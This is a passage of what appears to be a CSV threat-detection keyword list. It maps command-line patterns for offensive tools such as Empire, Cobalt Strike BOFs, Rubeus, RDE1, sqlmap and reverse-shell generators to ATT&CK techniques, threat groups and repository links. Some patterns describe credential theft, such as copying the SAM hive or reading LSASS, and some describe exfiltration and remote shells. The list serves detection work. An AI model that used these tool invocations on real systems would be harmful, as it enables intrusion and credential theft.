TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,0,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -* --random_user_agent*,offensive_tool_keyword,Spray365,Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/MarkoH17/Spray365,1,0,N/A,N/A,3,296,53,2022-07-14T14:45:57Z,2021-11-04T18:20:39Z -* --random-agent *,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* rarce.py*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating 
exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,0,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -* rasman.exe*,offensive_tool_keyword,RasmanPotato,using RasMan service for privilege escalation,T1548.002 - T1055.002 - T1055.001 ,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/crisprss/RasmanPotato,1,1,N/A,10,4,353,54,2023-02-06T10:27:41Z,2023-02-06T09:41:51Z -* -ratel *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -* RCE.py -*,offensive_tool_keyword,poc,Windows Message Queuing vulnerability exploitation with custom payloads,T1192 - T1507,TA0002,N/A,N/A,Network Exploitation Tools,https://github.com/Hashi0x/PoC-CVE-2023-21554,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rde1 crde_windows*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* rde1 srde_linux*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* rde1 
srde_macos*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* rde1 srde_windows*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* rdp * -u * -p * --nla-screenshot*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* rdp-enum-encryption.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rdp-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rdp-vuln-ms12-020.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ReadFromLsass*,offensive_tool_keyword,cobaltstrike,A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/WdToggle,1,0,N/A,10,10,217,32,2023-05-03T19:51:43Z,2020-12-23T13:42:25Z -* -RealCmdLine *,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,0,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -* -RealCmdLine *,offensive_tool_keyword,SwampThing,SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones,T1036.005 - T1564.002,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing,1,0,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -* realvnc-auth-bypass.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rec2 crde_linux*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* rec2 crde_macos*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,0,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -* redis-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* redis-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* redsocks.sh*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,0,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -* --reflective-injection *,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -* -Registry -AtStartup *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Persistence.psm1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -relayserver *:5555*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,0,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -* -remote -bindPipe * -bindPort * -security*,offensive_tool_keyword,invoke-piper,Forward local or remote tcp ports through SMB pipes.,T1003.001 - T1048 - T1021.002 - T1021.001 - T1090,TA0002 -TA0006 - TA0008,N/A,N/A,Lateral movement,https://github.com/p3nt4/Invoke-Piper,1,0,N/A,N/A,3,284,60,2021-03-07T19:07:01Z,2017-08-03T08:06:44Z -* -Remote -ExchHostname 
*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,0,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -* -RemoteDllHandle *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider 
- APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -remotefilepath *\\*.wav*,offensive_tool_keyword,POC,CVE-2023-23397 POC Powershell exploit,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/api0cradle/CVE-2023-23397-POC-Powershell,1,0,N/A,N/A,4,340,64,2023-03-17T07:47:40Z,2023-03-16T19:43:39Z -* --remote-impersonation*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,0,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -* -RemotePath *\Windows\System32\SAM -LocalPath *\tmp\*,offensive_tool_keyword,Wmisploit,WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.,T1087 - T1059.001 - T1047,TA0003 - TA0002 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/secabstraction/WmiSploit,1,0,N/A,N/A,2,163,39,2015-08-28T23:56:00Z,2015-03-15T03:30:02Z -* remove device GUID:001B2EE1-AE95-4146-AE7B-5928F1E4F396*,offensive_tool_keyword,SharpSCCM,SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI,T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/Mayyhem/SharpSCCM/,1,0,N/A,N/A,5,412,53,2023-09-16T17:33:11Z,2021-08-19T05:09:19Z -* renew *.kirbi*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* renew */ticket:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* repo -u https://github.com/*,offensive_tool_keyword,glit,Retrieve all mails of users related to a git repository a git user or a git organization,T1583 - T1059.001 - T1059.003,TA0002 - TA0003,N/A,N/A,Reconnaissance,https://github.com/shadawck/glit,1,0,N/A,8,1,34,6,2022-11-28T20:42:23Z,2022-11-14T11:25:10Z -* req -username * -p * -ca * -target * -template * -upn *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -request -dc-ip *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - 
T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -request -format hashcat -outputfile *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --requirement *Exegol/requirements.txt*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* resolveall.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* resu ten*,offensive_tool_keyword,powershell,powershell obfuscations techniques observed by malwares - reversed net user,T1021 - T1024 - T1027 - T1035 - T1059 - T1070,TA0001 - TA0002 - TA0003 - TA0005 - TA0006,Qakbot,N/A,Defense Evasion,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rev_shell.py*,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -* -Reverse -IPAddress * -Port *,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,0,Invoke-PowerShellTcp args,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -* reverse_shell_generator*,offensive_tool_keyword,reverse-shell-generator,Hosted Reverse Shell generator with a ton of functionality,T1059 T1071,N/A,N/A,N/A,POST Exploitation tools,https://github.com/0dayCTF/reverse-shell-generator,1,0,N/A,N/A,10,2271,510,2023-08-12T15:06:21Z,2021-02-27T00:53:13Z -* reverse-index.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -RevToSelf *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Get-System.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* rexec-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rfc868-time.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -Rhost * -WARFile http*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Exploit-JBoss.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -Rhosts * -Password * -Directory * -Dictionary *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,HTTP-Login.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -Rhosts * -Path *.txt -Port *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and 